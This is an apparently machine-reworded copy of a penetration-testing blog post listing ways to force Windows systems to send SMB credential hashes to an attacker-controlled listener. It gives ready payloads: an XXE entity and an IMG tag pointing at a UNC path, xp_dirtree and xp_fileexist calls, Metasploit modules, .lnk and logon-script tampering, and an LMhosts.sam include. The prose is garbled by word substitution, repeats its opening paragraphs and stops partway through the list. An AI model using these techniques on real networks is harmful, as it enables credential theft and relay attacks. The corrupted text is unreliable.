Recently at that spot was a big fuss over the "Redirect to SMB" spider web log that was divulge past times Brian Wallace. Personally, I intend that the recent scare over this vulnerability is a piddling overstated, but it could locomote a useful means to capture an SMB hash. I was already inwards the physical care for of putting together this list, thus here's a bunch of other ways that you lot tin forcefulness a UNC path in addition to capture credentials.
UNC paths are i of my favorite things to job during a pen test. Once I forcefulness an concern human relationship to authenticate to me over SMB, I convey ii options: Capture in addition to Crack the hash or Relay the hash on to approximately other computer. Plenty has been written virtually both options, thus nosotros won't comprehend that here. The methods outlined below should give you lot approximately options for where you lot tin job UNC paths to forcefulness authentication dorsum to your attacking box. Firewall rules in addition to file restrictions tin actually mess upwardly approximately of these, thus your mileage may vary.
For exhibit purposes, nosotros volition locomote using "\\192.168.1.123\test" equally our listening UNC path / SMB server.
Here's a linked table, if you lot desire to straight boundary to i of these:
"Internet Explorer's Intranet zone safety setting must locomote laid to Automatic logon exclusively inwards Intranet zone. This is the default setting for Internet Explorer." (Source)
Change the Id parameter inwards this URL:
This laid on also applies to Oracle. The Metasploit "auxiliary/admin/oracle/ora_ntlm_stealer" module tin create it in addition to there's a great spider web log virtually Oracle SMB relay on the ERPScan blog.
UNC paths are i of my favorite things to job during a pen test. Once I forcefulness an concern human relationship to authenticate to me over SMB, I convey ii options: Capture in addition to Crack the hash or Relay the hash on to approximately other computer. Plenty has been written virtually both options, thus nosotros won't comprehend that here. The methods outlined below should give you lot approximately options for where you lot tin job UNC paths to forcefulness authentication dorsum to your attacking box. Firewall rules in addition to file restrictions tin actually mess upwardly approximately of these, thus your mileage may vary.
For exhibit purposes, nosotros volition locomote using "\\192.168.1.123\test" equally our listening UNC path / SMB server.
Here's a linked table, if you lot desire to straight boundary to i of these:
- XML External Entity Injection
- Broken IMG Tags
- Directory Traversals
- Database Queries/injections
- File Shares
- Drive Mapping on Login
- Thick Applications
- The LMhosts.sam file
- SharePoint
- ARP spoofing - Ettercap filters
1. XML External Entity Injection
External entity injection tin locomote a really handy means to read files off of a remote system, but if that server happens to locomote a Windows system, you lot tin utilize a UNC path.<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:////192.168.1.123/test.txt" >]> <foo>&xxe;</foo>
Antti Rantasaari from NetSPI has been doing approximately actually cool operate inwards this space, thus cheque out his blogs for to a greater extent than info.2. Broken IMG Tags
Using a UNC path for an IMG tag tin locomote pretty useful. Depending on where your SMB listener is (on the internal network) in addition to what browser the victim is using (IE), there's a adventure that the browser volition only ship the hash over automatically. These tin also locomote embedded anywhere that may physical care for HTML (email, thick apps, etc.)."Internet Explorer's Intranet zone safety setting must locomote laid to Automatic logon exclusively inwards Intranet zone. This is the default setting for Internet Explorer." (Source)
<img src=\\192.168.1.123\test.gif>
3. Directory Traversals
I wrote virtually this a patch back, but spider web applications that allow you lot to specify a file path may locomote vulnerable to UNC path injection. By inputting a UNC path (instead of your typical ..\..\ or C:\ directory traversal), you lot may locomote able to capture the credentials for the service concern human relationship that runs the spider web application.Change the Id parameter inwards this URL:
4. Database Queries/injections
My co-worker, Scott Sutherland, wrote virtually using built-in SQL server procedures to create SMB relay attacks. This i tin locomote actually handy if you lot convey databases that allow the "domain users" grouping to authenticate. It's surprising to come across how many database servers are running amongst domain admin service accounts. Just job the xp_dirtree or xp_fileexist stored procedures in addition to betoken them at your SMB capture server.xp_dirtree '\\192.168.1.123\'
xp_fileexist '\\192.168.1.123\'
There's a bunch to a greater extent than SQL procedures out at that spot that you lot could potentially use, but these ii are pretty reliable. Anytime you lot tin read a file inwards SQL, you lot tin in all likelihood job a UNC path inwards it.This laid on also applies to Oracle. The Metasploit "auxiliary/admin/oracle/ora_ntlm_stealer" module tin create it in addition to there's a great spider web log virtually Oracle SMB relay on the ERPScan blog.
5. File Shares
If you lot convey write access to a file share, you lot convey a couplet of options for getting hashes.- Here's a great i from Mubix - Modify the path for the icons for .lnk shortcut links to a UNC path
- Microsoft Word documents tin also locomote modded amongst Metasploit (use auxiliary/docx/word_unc_injector) to inject UNC pathes into the documents.
6. Drive Mapping on Login
This may locomote overkill, but it could locomote handy for persistence. By modding whatever scripts used to map network drives for users, you lot tin add together your ain UNC path inwards equally an additional travail to map. This is handy equally whatever users who convey this travail added volition ship you lot credentials every fourth dimension they log in. If you lot don't convey rights to overwrite the starting fourth dimension upwardly scripts, GDS Security has a dainty blog virtually setting this upwardly amongst Metasploit in addition to spoofing the starting fourth dimension upwardly script server.7. Thick Applications
Basically anywhere that you lot tin enjoin an app to charge a file, you lot potentially add together inwards a UNC path. We convey seen many file upload dialogs inwards thick applications that allow this. This is fifty-fifty amend amongst hosted thick customer applications that are running nether the context of a final server user (and non the application user). This tin also locomote actually handy for kiosk applications. For to a greater extent than thick app breakouts, cheque out Scott's "Breaking Out!" blog.8. The LMhosts.sam file
Mubix has a couplet of great UNC tricks inwards his "AT is the novel black" presentation. I already called out the .lnk files upwardly above, but past times modifying the LMhosts.sam file, you lot tin sneak inwards a UNC path that forces the user to charge a remote hosts file. Here's a sample LMhosts.sam using our UNC path:192.168.1.123 netspi #PRE #BEGIN_ALTERNATE #INCLUDE \\netspi\test\hosts.txt #END_ALTERNATE